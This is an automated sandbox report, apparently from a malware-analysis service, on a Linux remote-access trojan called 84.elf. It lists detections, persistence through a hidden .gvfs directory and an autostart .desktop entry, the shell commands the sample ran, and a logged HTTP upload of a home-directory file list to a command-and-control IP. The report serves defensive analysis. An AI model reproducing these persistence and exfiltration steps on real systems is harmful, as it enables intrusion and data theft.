Linux Analysis Report
84.elf

Overview

General Information

Sample name: 84.elf
Analysis ID: 1522470
MD5: 51ac5f4bcffd208899ebe778c1725579
SHA1: 807c42578f63b569f37a95dc29267ef6c4ec9eea
SHA256: 684d950494951cda868a6d1d83e2ab8baedb7b4f2e8b079ab94771fb4fabd09a

Detection

Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Sample and/or dropped files likely contain functionality related to malicious behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using .desktop files
Uses known network protocols on non-standard ports
Writes ELF files to hidden directories
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "uname" command used to read OS and architecture name
Sample and/or dropped files contains symbols with suspicious names
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

AV Detection

Source: 84.elf Avira: detected
Source: /root/.gvfs/84.elf Avira: detection malicious, Label: LINUX/AVI.Agent.xapoa
Source: 84.elf ReversingLabs: Detection: 58%
Source: 84.elf Virustotal: Detection: 52%

Networking

Source: Network traffic Suricata IDS: 2829852 - Severity 1 - ETPRO MALWARE Py/Cannibal RAT Checkin M2 : 192.168.2.23:60528 -> 84.247.176.126:33548
Source: unknown Network traffic detected: HTTP traffic on port 60486 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60486
Source: unknown Network traffic detected: HTTP traffic on port 60488 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60488
Source: unknown Network traffic detected: HTTP traffic on port 60490 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60490
Source: unknown Network traffic detected: HTTP traffic on port 60492 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60492
Source: unknown Network traffic detected: HTTP traffic on port 60494 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60494
Source: unknown Network traffic detected: HTTP traffic on port 60496 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60496
Source: unknown Network traffic detected: HTTP traffic on port 60498 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60498
Source: unknown Network traffic detected: HTTP traffic on port 60500 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60500
Source: unknown Network traffic detected: HTTP traffic on port 60502 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60502
Source: unknown Network traffic detected: HTTP traffic on port 60504 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60504
Source: unknown Network traffic detected: HTTP traffic on port 60506 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60506
Source: unknown Network traffic detected: HTTP traffic on port 60508 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60508
Source: unknown Network traffic detected: HTTP traffic on port 60510 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60510
Source: unknown Network traffic detected: HTTP traffic on port 60512 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60512
Source: unknown Network traffic detected: HTTP traffic on port 60514 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60514
Source: unknown Network traffic detected: HTTP traffic on port 60516 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60516
Source: unknown Network traffic detected: HTTP traffic on port 60518 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60518
Source: unknown Network traffic detected: HTTP traffic on port 60520 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60520
Source: unknown Network traffic detected: HTTP traffic on port 60522 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60522
Source: unknown Network traffic detected: HTTP traffic on port 60524 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60524
Source: unknown Network traffic detected: HTTP traffic on port 60526 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60526
Source: unknown Network traffic detected: HTTP traffic on port 60528 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60528
Source: unknown Network traffic detected: HTTP traffic on port 60530 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60530
Source: unknown Network traffic detected: HTTP traffic on port 60532 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60532
Source: unknown Network traffic detected: HTTP traffic on port 60534 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 60534
Source: global traffic TCP traffic: 192.168.2.23:60486 -> 84.247.176.126:33548
Source: unknown TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown HTTP traffic detected:
POST /api/root_265403912816988/upload HTTP/1.1
Host: 84.247.176.126:33548
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 269
Content-Type: multipart/form-data; boundary=12b1182436e74c268d609ba7cbab3f4c
Data Raw: 2d 2d 31 32 62 31 31 38 32 34 33 36 65 37 34 63 32 36 38 64 36 30 39 62 61 37 63 62 61 62 33 66 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 65 64 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 69 73 74 2e 74 78 74 22 0d 0a 0d 0a 2e 2f 2e 62 61 73 68 72 63 0a 2e 2f 2e 70 72 6f 66 69 6c 65 0a 2e 2f 2e 73 73 68 2f 61 75 74 68 6f 72 69 7a 65 64 5f 6b 65 79 73 0a 2e 2f 2e 63 6f 6e 66 69 67 2f 6d 69 6d 65 61 70 70 73 2e 6c 69 73 74 0a 2e 2f 2e 76 69 6d 69 6e 66 6f 0a 2e 2f 2e 6c 6f 63 61 6c 2f 73 68 61 72 65 2f 61 70 70 6c 69 63 61 74 69 6f 6e 73 2f 6d 69 6d 65 61 70 70 73 2e 6c 69 73 74 0a 0d 0a 2d 2d 31 32 62 31 31 38 32 34 33 36 65 37 34 63 32 36 38 64 36 30 39 62 61 37 63 62 61 62 33 66 34 63 2d 2d 0d 0a
Data Ascii:
--12b1182436e74c268d609ba7cbab3f4c
Content-Disposition: form-data; name="uploaded"; filename="list.txt"

./.bashrc
./.profile
./.ssh/authorized_keys
./.config/mimeapps.list
./.viminfo
./.local/share/applications/mimeapps.list
--12b1182436e74c268d609ba7cbab3f4c--
Source: libpython2.7.so.1.0.16.dr String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: cacert.pem.16.dr String found in binary or memory: http://www.chambersign.org
Source: libpython2.7.so.1.0.16.dr String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: libpython2.7.so.1.0.16.dr String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).xxsubtype
Source: old_root.pem.16.dr String found in binary or memory: http://www.valicert.com/
Source: PKG-INFO.16.dr String found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=master
Source: PKG-INFO.16.dr String found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=master
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://cryptography.io
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://cryptography.io/
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: PKG-INFO.16.dr String found in binary or memory: https://github.com/pyca/cryptography
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://pypi.python.org/pypi/cryptography/
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: PKG-INFO.16.dr String found in binary or memory: https://travis-ci.org/pyca/cryptography
Source: PKG-INFO.16.dr String found in binary or memory: https://travis-ci.org/pyca/cryptography.svg?branch=master
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_get_keylog_callback
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_set_keylog_callback
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_SESSION_print_keylog
Source: _ssl.so.16.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: _ssl.so.16.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: _ssl.so.16.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: _ssl.so.16.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: cryptography.hazmat.bindings._openssl.so.16.dr ELF static info symbol of dropped file: Cryptography_pem_password_cb
Source: cryptography.hazmat.bindings._openssl.so.16.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: cryptography.hazmat.bindings._openssl.so.16.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libcrypto.so.1.1.16.dr ELF static info symbol of dropped file: CMS_RecipientInfo_set0_password
Source: libcrypto.so.1.1.16.dr ELF static info symbol of dropped file: CMS_add0_recipient_password
Source: libcrypto.so.1.1.16.dr ELF static info symbol of dropped file: CMS_decrypt_set1_password
Source: libpython2.7.so.1.0.16.dr ELF static info symbol of dropped file: PyOS_InputHook
Source: libpython2.7.so.1.0.16.dr ELF static info symbol of dropped file: _PyImportHooks_Init
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: _rl_match_hidden_files
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_completion_word_break_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_directory_completion_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_directory_rewrite_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_event_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_execute_next
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_filename_rewrite_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_filename_stat_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_input_available_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_pre_input_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_signal_event_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_startup_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: rl_username_completion_function
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: tilde_expansion_failure_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: tilde_expansion_preexpansion_hook
Source: libreadline.so.7.16.dr ELF static info symbol of dropped file: username_completion_function
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_set_srp_password
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_set_srp_username
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_CTX_set_srp_username_callback
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_get_default_passwd_cb
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_get_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_get_srp_username
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_set_default_passwd_cb
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_set_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr ELF static info symbol of dropped file: SSL_srp_server_param_with_username
Source: readline.so.16.dr ELF static info symbol of dropped file: PyOS_InputHook
Source: readline.so.16.dr ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: readline.so.16.dr ELF static info symbol of dropped file: rl_pre_input_hook
Source: readline.so.16.dr ELF static info symbol of dropped file: rl_startup_hook
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal92.troj.evad.linELF@0/39@0/0

Persistence and Installation Behavior

Source: /tmp/84.elf (PID: 6257) File: /proc/6257/mounts
Source: /tmp/84.elf (PID: 6257) File: /root/.config/autostart/gvfs.desktop
Source: /tmp/84.elf (PID: 6257) File written to hidden directory: /root/.gvfs/84.elf
Source: /tmp/84.elf (PID: 6257) Directory: /root/.gvfs
Source: /usr/bin/find (PID: 6385) Directory: /root/.
Source: /usr/bin/find (PID: 6385) Directory: /root/.cache
Source: /usr/bin/find (PID: 6385) Directory: /root/.ssh
Source: /usr/bin/find (PID: 6385) Directory: /root/.config
Source: /usr/bin/find (PID: 6385) Directory: /root/.local
Source: /tmp/84.elf (PID: 6260) Shell command executed: sh -c "uname -p 2> /dev/null"
Source: /tmp/84.elf (PID: 6384) Shell command executed: sh -c "cd; find . -type f > /tmp/list.txt"
Source: /tmp/84.elf (PID: 6389) Shell command executed: sh -c "chmod +x /root/.gvfs/84.elf"
Source: /bin/sh (PID: 6390) Chmod executable: /usr/bin/chmod -> chmod +x /root/.gvfs/84.elf
Source: /usr/bin/dash (PID: 6228) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dyRqBbtRkK /tmp/tmp.wSbLfeKNbu /tmp/tmp.up7UPCnJlz
Source: /usr/bin/dash (PID: 6229) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dyRqBbtRkK /tmp/tmp.wSbLfeKNbu /tmp/tmp.up7UPCnJlz
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_cffi_backend.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_codecs_cn.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_codecs_hk.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_codecs_iso2022.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_codecs_jp.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_codecs_kr.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_codecs_tw.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_ctypes.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_hashlib.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_json.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_multibytecodec.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/_ssl.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/bz2.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libbz2.so.1.0 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libcrypto.so.1.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libexpat.so.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libffi.so.6 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libpython2.7.so.1.0 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libreadline.so.7 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libssl.so.1.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libtinfo.so.5 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/libz.so.1 (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/pyexpat.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/readline.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/resource.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/termios.so (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/certifi/cacert.pem (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/certifi/old_root.pem (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/certifi/weak.pem (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/PKG-INFO (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/not-zip-safe (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/requires.txt (bits: - usr: - grp: - all: rwx)
Source: /tmp/84.elf (PID: 6254) File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/top_level.txt (bits: - usr: - grp: - all: rwx)
Source: /usr/bin/chmod (PID: 6390) File: /root/.gvfs/84.elf (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_cffi_backend.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_codecs_cn.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_codecs_hk.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_codecs_iso2022.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_codecs_jp.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_codecs_kr.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_codecs_tw.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_ctypes.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_hashlib.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_json.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_multibytecodec.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/_ssl.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/bz2.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libbz2.so.1.0
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libcrypto.so.1.1
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libexpat.so.1
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libffi.so.6
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libpython2.7.so.1.0
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libreadline.so.7
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libssl.so.1.1
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libtinfo.so.5
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/libz.so.1
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/pyexpat.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/readline.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/resource.so
Source: /tmp/84.elf (PID: 6254) File written: /tmp/_MEITTIAO4/termios.so
Source: /tmp/84.elf (PID: 6257) File written: /root/.gvfs/84.elf

Hooking and other Techniques for Hiding and Protection

Source: _codecs_cn.so.16.dr Dropped file: segment LOAD with 7.4298 entropy (max. 8.0)
Source: /tmp/84.elf (PID: 6257) Queries kernel information via 'uname'
Source: /sbin/ldconfig.real (PID: 6259) Queries kernel information via 'uname'
Source: /usr/bin/uname (PID: 6261) Queries kernel information via 'uname'
Source: /usr/bin/find (PID: 6385) Queries kernel information via 'uname'
Source: cacert.pem.16.dr Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
Source: /bin/sh (PID: 6261) Uname executable: /usr/bin/uname -> uname -p